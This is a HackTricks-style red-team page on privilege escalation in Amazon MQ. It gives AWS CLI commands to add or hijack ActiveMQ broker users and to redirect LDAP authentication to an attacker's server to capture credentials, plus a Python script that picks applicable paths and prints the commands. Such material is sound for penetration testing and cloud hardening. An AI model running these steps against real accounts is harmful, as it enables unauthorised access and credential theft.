AWS - MQ Privesc
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
MQ
For more information about MQ check:
mq:ListBrokers, mq:CreateUser
With those permissions you can create a new user in an ActiveMQ broker (this doesn't work in RabbitMQ brokers, where Amazon MQ does not manage users through the API):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
Note that ActiveMQ user changes are recorded as pending (see the PendingChange field in list-users / describe-user) and only take effect once the broker is rebooted, so you either need mq:RebootBroker as well or have to wait for the next maintenance window.
Potential Impact: Log in to the ActiveMQ web console (and connect to the broker endpoints) with the new user and read the messages and configuration exposed there.
mq:ListBrokers, mq:ListUsers, mq:UpdateUser
With those permissions you can take over an existing user of an ActiveMQ broker by resetting its password and granting it console access (this doesn't work in RabbitMQ):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
As with create-user, the change stays pending until the broker is rebooted. Resetting the password of a user that applications use will break their logins, so this path is noisier than creating a new user.
Potential Impact: Access sensitive info navigating through ActiveMQ as the hijacked user.
mq:ListBrokers, mq:UpdateBroker
If an ActiveMQ broker uses LDAP for authentication and authorization (AuthenticationStrategy is LDAP in describe-broker), it's possible to change the LDAP server configuration to one controlled by the attacker. The broker will then send its service-account bind and every user login to the attacker's server, who can harvest all the credentials sent through LDAP. Like user changes, the update is pending until the broker is rebooted (mq:RebootBroker or the next maintenance window).
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
If you could somehow find the original credentials used by ActiveMQ (the LDAP service account), you could perform a MitM: accept the binds on your server, forward them to the real LDAP server and relay its responses, so logins keep working and the change goes unnoticed (often the credentials captured in the first binds are enough to set up that relay).
Potential Impact: Steal ActiveMQ credentials
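As an added triage helper (not code from the original page or from HackTricks), the script below takes `aws mq describe-broker` output plus the mq:* actions you hold and reports which of the three paths above apply, with the CLI commands ready to fill in. The three sample broker documents are constructed, not real API output; the broker IDs, names and LDAP values are placeholders. Field names follow the describe-broker response (EngineType, AuthenticationStrategy, Users, LdapServerMetadata).

```python
"""Triage which Amazon MQ privesc paths apply to a broker.

Usage: aws mq describe-broker --broker-id <id> > broker.json
       python3 mq_triage.py broker.json mq:ListBrokers mq:CreateUser
"""
import json
import sys

# Constructed sample documents (NOT real describe-broker output).
SAMPLE_ACTIVEMQ_LDAP = {
    "BrokerId": "b-00000000-0000-0000-0000-000000000001",
    "BrokerName": "orders-broker",
    "EngineType": "ACTIVEMQ",
    "AuthenticationStrategy": "LDAP",
    "Users": [],
    "LdapServerMetadata": {
        "Hosts": ["ldap.corp.example"],
        "ServiceAccountUsername": "cn=amazonmq,ou=svc,dc=corp,dc=example",
        "UserBase": "ou=users,dc=corp,dc=example",
        "UserSearchMatching": "uid={0}",
    },
}
SAMPLE_ACTIVEMQ_SIMPLE = {
    "BrokerId": "b-00000000-0000-0000-0000-000000000002",
    "BrokerName": "billing-broker",
    "EngineType": "ACTIVEMQ",
    "AuthenticationStrategy": "SIMPLE",
    "Users": [{"Username": "admin"},
              {"Username": "svc-billing", "PendingChange": "UPDATE"}],
}
SAMPLE_RABBITMQ = {
    "BrokerId": "b-00000000-0000-0000-0000-000000000003",
    "BrokerName": "events-broker",
    "EngineType": "RABBITMQ",
    "AuthenticationStrategy": "SIMPLE",
}


def privesc_paths(broker, actions):
    """Return the applicable paths for `broker` given the held mq:* actions.

    Each entry has a short name, why it works and the commands to run.
    All three paths need a reboot (mq:RebootBroker or maintenance window)
    before the pending change is applied, which `needs_reboot` records.
    """
    held = set(actions)
    bid = broker["BrokerId"]
    paths = []
    # create-user / update-user / LDAP metadata only exist for ActiveMQ brokers.
    if broker.get("EngineType", "").upper() != "ACTIVEMQ":
        return paths
    if {"mq:ListBrokers", "mq:CreateUser"} <= held:
        paths.append({
            "path": "create-user",
            "why": "add a new broker user with web-console access",
            "cmds": [f"aws mq create-user --broker-id {bid} --console-access "
                     f"--username <user> --password <pass>"],
            "needs_reboot": True,
        })
    if {"mq:ListBrokers", "mq:ListUsers", "mq:UpdateUser"} <= held:
        targets = [u["Username"] for u in broker.get("Users", [])]
        paths.append({
            "path": "update-user",
            "why": "reset the password of an existing user: "
                   + (", ".join(targets) or "(run list-users first)"),
            "cmds": [f"aws mq list-users --broker-id {bid}"]
                    + [f"aws mq update-user --broker-id {bid} --console-access "
                       f"--username {u} --password <pass>" for u in targets],
            "needs_reboot": True,
        })
    if ({"mq:ListBrokers", "mq:UpdateBroker"} <= held
            and broker.get("AuthenticationStrategy") == "LDAP"):
        hosts = broker.get("LdapServerMetadata", {}).get("Hosts", [])
        paths.append({
            "path": "update-broker-ldap",
            "why": f"repoint LDAP auth (currently {hosts}) at your own server "
                   "to capture the service-account and user binds",
            "cmds": [f"aws mq update-broker --broker-id {bid} "
                     "--ldap-server-metadata <json>"],
            "needs_reboot": True,
        })
    return paths


if __name__ == "__main__":
    with open(sys.argv[1]) as fh:
        doc = json.load(fh)
    for p in privesc_paths(doc, sys.argv[2:]):
        print(f"[{p['path']}] {p['why']}")
        for c in p["cmds"]:
            print("   ", c)
        if p["needs_reboot"]:
            print("    aws mq reboot-broker --broker-id", doc["BrokerId"])
```

Running it against a RabbitMQ broker yields nothing even with every action held, which matches the "doesn't work in RabbitMQ" caveats above; against the SIMPLE-auth ActiveMQ sample only the user paths show up, and the LDAP path only appears when the broker actually authenticates through LDAP.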